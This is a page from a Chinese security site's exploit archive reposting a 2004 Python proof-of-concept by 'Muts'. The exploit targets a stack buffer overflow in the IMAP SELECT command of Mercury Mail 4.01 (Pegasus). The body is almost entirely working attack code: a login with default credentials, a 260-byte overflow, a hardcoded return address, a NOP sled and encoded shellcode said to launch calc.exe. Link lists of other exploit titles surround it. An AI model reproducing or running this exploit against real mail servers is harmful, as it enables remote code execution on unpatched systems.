首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit
来源:WWW.WHITEHAT.CO.IL 作者:Muts 发布时间:2004-11-30  

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit

#########################################################
#
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow
# Discovered by : Muts
# Coded by : Muts
# WWW.WHITEHAT.CO.IL
# Plain vanilla stack overflow in the SELECT command
#
#########################################################


import struct
import socket
from time import sleep

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Lame calc.exe shellcode - dont expect miracles!

sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
sc2 += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
sc2 += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
sc2 += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
sc2 += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
sc2 += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
sc2 += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
sc2 += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
sc2 += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"

#Change RET Address as needed
buffer = '\x41'*260 + struct.pack('<L', 0x782f28f7)+ '\x90'*32+sc2

print "\nSending evil buffer..."
s.connect(('192.168.1.167',143))
s.send('a001 LOGIN ftp ftp' + '\r\n')
data = s.recv(1024)
sleep(3)
s.send('A001 SELECT ' + buffer+'\r\n')
data = s.recv(1024)
s.close()
print "\nDone! "



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·php <= 4.3.7 and <= 5.0.
·Atari800 v.1.3.0 Local Root Ex
·MailEnable IMAP service Remote
·Soldier of Fortune II <= 1.
·Winamp <= 5.06 'IN_CDDA.dll
·phpBB admin_cash.php File Incl
·WodFtpDLX Client ActiveX Contr
·Star Wars Battlefront Fake Pla
·Halo Broadcast Client Crash
·WS_FTP Server MKD Buffer Overf
·GFHost PHP GMail Remote Comman
·Serious engine Fake Players Do
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved